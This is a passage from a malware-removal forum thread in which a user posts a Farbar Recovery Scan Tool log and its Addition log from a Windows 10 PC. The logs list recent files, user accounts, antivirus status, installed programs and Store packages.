2021-01-09 08:12 - 2021-01-09 08:12 - 000000000 ____D C:\Program Files (x86)\PrivaZer
2021-01-07 13:56 - 2021-01-07 13:56 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-07 09:04 - 2021-01-09 08:06 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-03 08:36 - 2021-01-16 10:12 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Exodus
2021-01-03 08:36 - 2021-01-16 10:02 - 000002280 _____ C:\Users\IRENA-PC\Desktop\Exodus.lnk
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Exodus Movement Inc
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\exodus
2020-12-26 19:07 - 2020-12-27 17:58 - 000000000 ___RD C:\Users\IRENA-PC\Dropbox
2020-12-26 18:55 - 2020-12-26 18:55 - 000669800 _____ (Dropbox, Inc.) C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe
2020-12-21 09:07 - 2021-01-09 15:16 - 000002869 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (1).lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-01-20 18:43 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-20 18:40 - 2020-08-19 19:06 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-20 18:17 - 2020-08-19 19:15 - 001693136 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-20 18:17 - 2019-12-07 15:43 - 000716742 _____ C:\WINDOWS\system32\perfh005.dat
2021-01-20 18:17 - 2019-12-07 15:43 - 000144920 _____ C:\WINDOWS\system32\perfc005.dat
2021-01-20 18:17 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-20 18:13 - 2020-08-19 19:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-20 18:13 - 2020-08-19 19:06 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-20 18:13 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-20 18:13 - 2018-12-26 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-01-20 18:04 - 2020-06-30 17:37 - 000002296 ____H C:\Users\IRENA-PC\Documents\Default.rdp
2021-01-20 13:09 - 2017-11-05 22:29 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Packages
2021-01-20 12:56 - 2020-09-06 10:11 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\PrivaZer
2021-01-20 11:10 - 2017-03-10 18:17 - 000044146 _____ C:\Users\IRENA-PC\Documents\klikačky.txt
2021-01-20 10:02 - 2017-01-30 08:45 - 000000000 ____D C:\Users\IRENA-PC\AppData\LocalLow\Mozilla
2021-01-20 09:46 - 2019-02-05 07:34 - 000000000 ____D C:\ProgramData\Mozilla
2021-01-20 08:48 - 2018-05-16 16:28 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Kryptex
2021-01-20 08:17 - 2018-06-14 10:05 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0
2021-01-20 07:08 - 2020-08-19 19:19 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-01-20 07:08 - 2020-08-19 19:19 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-01-17 13:54 - 2017-07-05 17:16 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\vlc
2021-01-15 07:06 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-01-14 04:09 - 2020-08-19 19:07 - 000000000 ____D C:\Users\IRENA-PC
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-01-13 21:55 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-01-13 21:43 - 2020-08-19 19:08 - 002877952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2021-01-13 21:32 - 2017-01-29 22:43 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-01-13 21:28 - 2017-01-29 22:43 - 135062968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-01-13 13:42 - 2019-04-16 19:31 - 000018134 _____ C:\Users\IRENA-PC\Documents\web hlavní stránka.txt
2021-01-11 20:14 - 2018-10-14 17:50 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\avidemux
2021-01-10 14:44 - 2019-03-19 10:59 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Ulozto
2021-01-09 18:46 - 2017-02-16 12:26 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome
2021-01-09 18:43 - 2017-12-16 15:22 - 000000000 ____D C:\Program Files (x86)\IQ Option
2021-01-09 15:16 - 2020-05-06 13:44 - 000002563 _____ C:\Users\IRENA-PC\Desktop\YouTube Music.lnk
2021-01-09 15:16 - 2020-03-26 15:41 - 000002689 _____ C:\Users\IRENA-PC\Desktop\SS TV Remote.lnk
2021-01-09 08:06 - 2017-01-30 08:44 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-08 13:28 - 2020-06-04 19:19 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-07 13:56 - 2017-01-30 08:44 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-01-05 10:28 - 2020-07-25 06:20 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Telegram Desktop
2021-01-05 10:17 - 2019-10-29 08:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Telegram Desktop
2021-01-03 17:07 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Authy Desktop
2021-01-03 10:57 - 2019-01-02 09:37 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\HandBrake
2021-01-03 08:36 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\SquirrelTemp
2020-12-28 18:45 - 2019-07-07 19:03 - 000001086 _____ C:\Users\IRENA-PC\Documents\telenovely.txt
2020-12-23 20:11 - 2017-04-27 15:39 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Ulozto File Manager
2020-12-22 18:29 - 2020-08-19 19:19 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-12-22 18:28 - 2020-12-15 18:05 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000001382 _____ C:\Users\Public\Desktop\Free Netflix Download.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeGrabApp
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\Program Files (x86)\FreeGrabApp

==================== Files in the root of some directories ========

2019-01-25 08:47 - 2019-02-04 08:42 - 000012386 _____ () C:\Users\IRENA-PC\AppData\Roaming\downloads.json

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

Re: Please check my log

Posted: 20 Jan 2021 18:52
by chenny
Addition log

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-01-2021
Ran by IRENA-PC (20-01-2021 18:44:34)
Running from C:\Users\IRENA-PC\Desktop
Windows 10 Pro Version 2004 19041.746 (X64) (2020-08-19 18:19:30)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3708313529-2431682257-2596704864-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3708313529-2431682257-2596704864-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-3708313529-2431682257-2596704864-1000 - Limited - Disabled)
Guest (S-1-5-21-3708313529-2431682257-2596704864-501 - Limited - Disabled)
IRENA-PC (S-1-5-21-3708313529-2431682257-2596704864-1001 - Administrator - Enabled) => C:\Users\IRENA-PC
WDAGUtilityAccount (S-1-5-21-3708313529-2431682257-2596704864-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

„Microsoft Office Proofing Tools 2016“ – lietuvių k. (HKLM\...\{90160000-001F-0427-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Adobe Photoshop CC 2019 (HKLM-x32\...\PHSP_20_0_4) (Version: 20.0.4 - Adobe Systems Incorporated)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
Alati za jezičnu provjeru u sustavu Microsoft Office 2016 - hrvatski (HKLM\...\{90160000-001F-041A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Authy Desktop (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\authy) (Version: 1.8.3 - Twilio Inc.)
Avidemux 2.7 - 64 bits (HKLM-x32\...\Avidemux 2.7 - 64 bits (64-bit)) (Version: 2.7.1.180604 - )
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{3598910c-c7d9-450b-bfde-5a8d49dabd30}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{8cbf4d89-2ce8-4178-8bb4-1600f5e69e65}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{b859fd90-1d56-4013-8e47-a727a65ae7a3}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{c28b1ebe-2fed-4e19-a347-e0629e5cf6f5}) (Version: 2.7.2 - Mean)
Bighits4U Viewer 3.6 (HKLM-x32\...\{ACC1EF6D-F9C2-4B5E-BA01-25F3F9E57B68}) (Version: 3.6.0 - BigHits4U) Hidden
Bighits4U Viewer 3.6 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Bighits4U Viewer 3.6 3.6.0) (Version: 3.6.0 - BigHits4U)
Công cụ Soát lỗi Microsoft Office 2016 - Tiếng Việt (HKLM\...\{90160000-001F-042A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Eines de correcció del Microsoft Office 2016: català (HKLM\...\{90160000-001F-0403-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Exodus (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\exodus) (Version: 21.1.15 - Exodus Movement Inc)
Ferramentas de Verificação do Microsoft Office 2016 - Português (HKLM\...\{90160000-001F-0816-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM\...\{90160000-001F-0456-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Free MP3 Cutter 1.01 (HKLM-x32\...\{847E0734-4457-4B48-BF49-998D1CF2CFA1}_is1) (Version: - PolySoft Solutions)
Free Netflix Download version 5.0.16.1204 (HKLM-x32\...\Free Netflix Download_is1) (Version: 5.0.16.1204 - FreeGrabApp Ltd)
GhostMouse (HKLM-x32\...\GhostMouse_is1) (Version: Free V3.2.3 - ghost-mouse.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
Greenshot 1.2.9.129 (HKLM\...\Greenshot_is1) (Version: 1.2.9.129 - Greenshot)
HandBrake 1.2.2 (HKLM-x32\...\HandBrake) (Version: 1.2.2 - )
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
I-Microsoft Office Proofing Tools 2016 - IsiZulu (HKLM\...\{90160000-001F-0435-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Innealan-dearbhaidh Microsoft Office 2016 - Gàidhlig (HKLM\...\{90160000-001F-0491-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Instrumente de verificare Microsoft Office 2016 - Română (HKLM\...\{90160000-001F-0418-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Java 8 Update 271 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180271F0}) (Version: 8.0.2710.9 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Korrekturredskaber til Microsoft Office 2016 - Dansk (HKLM\...\{90160000-001F-0406-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (bokmål) (HKLM\...\{90160000-001F-0414-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (nynorsk) (HKLM\...\{90160000-001F-0814-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
MediaInfo 18.05 (HKLM\...\MediaInfo) (Version: 18.05 - MediaArea.net)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.71 - )
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Office Proofing Tools Kit Compilation 2016 (HKLM\...\Office16.PROOFKIT) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Project Professional 2016 (HKLM\...\Office16.PRJPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visio Professional 2016 (HKLM\...\Office16.VISPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 (HKLM-x32\...\{95ac1cfa-f4fb-4d1b-8912-7f9d5fbb140d}) (Version: 14.15.26706.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (HKLM-x32\...\{7e9fae12-5bbf-47fb-b944-09c49e75c061}) (Version: 14.15.26706.0 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 cs) (HKLM\...\Mozilla Firefox 84.0.2 (x64 cs)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 55.0.1 - Mozilla)
Mp3tag v2.97 (HKLM-x32\...\Mp3tag) (Version: 2.97 - Florian Heidenreich)
Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (HKLM\...\{90160000-001F-0415-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Orodja za preverjanje za Microsoft Office 2016 – angleščina (HKLM\...\{90160000-001F-0424-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
PrivaZer (HKLM-x32\...\PrivaZer) (Version: 4.0.17.0 - Goversoft LLC)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 4.3.1 r3321 - Rainmeter)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM\...\{90160000-001F-0416-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
RoboForex - MetaTrader 4 (HKLM-x32\...\RoboForex - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Strumenti di correzione di Microsoft Office 2016 - Italiano (HKLM\...\{90160000-001F-0410-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Subtitle Edit 3.5.18 (HKLM\...\SubtitleEdit_is1) (Version: 3.5.18.1 - Nikse)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1254 - SUPERAntiSpyware.com)
Taalprogramma's voor Microsoft Office 2016 - Nederlands (HKLM\...\{90160000-001F-0413-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.2.2756 - TeamViewer)
Telegram Desktop version 2.5.1 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 2.5.1 - Telegram FZ-LLC)
Total Commander 64+32-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.21a - Ghisler Software GmbH)
Tweetz Desktop verze 0.11.0 (HKLM-x32\...\{FE1B7E2D-6E96-4D39-B39F-62CA62D11A79}_is1) (Version: 0.11.0 - Mike Ward)
Uirlisí Profála Microsoft Office 2016 - Gaeilge (HKLM\...\{90160000-001F-083C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ulož.to FileManager 2.82 (64-bit) (HKLM\...\3f2e2cd28b0e4e4396c2402fbc85a0f0_is1) (Version: 2.82 - Uloz.to cloud a.s.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation)
Veglat e kontrollit gjuhësor të Microsoft Office 2016 - shqip (HKLM\...\{90160000-001F-041C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Web Launch Recorder (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\WebLaunchRecorder) (Version: 2.0 - )
Εργαλεία γλωσσικού ελέγχου του Microsoft Office 2016 - Ελληνικά (HKLM\...\{90160000-001F-0408-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Засоби перевірки правопису Microsoft Office 2016 – українська (HKLM\...\{90160000-001F-0422-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Средства проверки правописания Microsoft Office 2016 — русский (HKLM\...\{90160000-001F-0419-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
כלי ההגהה של Microsoft Office 2016 - עברית (HKLM\...\{90160000-001F-040D-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
ابزارهای تصحیح Microsoft Office 2016 - فارسی (HKLM\...\{90160000-001F-0429-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden

Packages:
=========
Deezer Music -> C:\Program Files\WindowsApps\Deezer.62021768415AF_4.32.0.0_x86__q7m17pa7q8kj0 [2021-01-19] (Deezer SA)
Easy WOL (Wake on LAN) -> C:\Program Files\WindowsApps\1460ArunasAdomaitis.EasyWOLWakeonLAN_1.1.1.0_x64__fzh5k4x0zh00p [2019-05-21] (Arunas Adomaitis)
Facebook -> C:\Program Files\WindowsApps\Facebook.Facebook_186.2619.19263.0_x86__8xx8rvfyw5nnt [2019-10-10] (Facebook Inc)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.1102.0_x64__8wekyb3d8bbwe [2021-01-13] (Microsoft Studios) [MS Ad]
Microsoft To Do -> C:\Program Files\WindowsApps\Microsoft.Todos_2.36.4182.0_x64__8wekyb3d8bbwe [2021-01-19] (Microsoft Corporation) [Startup Task]
Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.16.20102.0_x64__8wekyb3d8bbwe [2020-12-16] (Microsoft Studios)
Samsung Printer Experience -> C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCO.LTD.SamsungPrinterExperience_1.3.15.0_x64__3c1yjt4zspk6g [2017-02-03] (Samsung Electronics Co. Ltd.)
Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-08] (Twitter Inc.)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
